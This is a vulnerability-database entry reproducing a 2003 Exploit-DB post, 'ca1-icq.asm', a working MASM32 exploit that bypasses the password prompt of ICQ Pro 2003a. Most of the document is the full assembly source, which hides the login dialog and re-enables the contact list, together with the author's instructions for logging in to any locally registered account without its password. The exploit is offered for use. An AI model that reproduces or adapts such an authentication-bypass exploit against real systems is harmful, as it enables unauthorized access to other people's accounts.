ICQ Pro 2003a – ‘ca1-icq.asm’ Password Bypass

Vulnerability ID 1054024 Vulnerability type
Published 2003-07-09 Updated 2003-07-09
CVE ID N/A
CNNVD-ID N/A
Platform Windows CVSS score N/A
|Source
https://www.exploit-db.com/exploits/52
|Details
Vulnerability details have not been disclosed
|Exploit
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF 
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm 
;  ICQ Password Bypass exploit.
;  written by Caua Moura Prado (aka ca1)
; 
;  This exploit allows you to login to ICQ server using any account registered *locally*,
;  whether or not the 'save password' option is checked. High level security is also bypassed. 
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run 
;  the exploit again. 
;
;        uh-oh!
;         ___     
;      __/   __  
;     /  ___/          Vulnerable:
;     __/+ +__/          ICQ Pro 2003a Build #3800
;     /   ~~~   
;     __/   __/        Not Vulnerable:
;        ___/                ICQ Lite alpha Build 1211
;                               ICQ 2001b and ICQ 2002a 
;    tHe Flaw Power       All other versions were not tested.                       
;                                                      
;                           coded with masm32
; ________________________________________________________________exploit born in .br
        
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0 
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
 invoke FindWindow, addr szClassName, addr szTextHigh
 mov hWndLogin, eax  
 .if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
 .endif 
 invoke GetParent, hWndLogin 
 invoke EnableWindow, eax, 1      ;Enable ICQ contact list
 invoke ShowWindow, hWndLogin, 0  ;get rid of Login screen (don't kill this window)
 invoke ExitProcess, 0            ;uhuu.. cya! i gotta sleep!
end _entrypoint

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF 
; -------------------------------------------------------------------------



; milw0rm.com [2003-07-09]
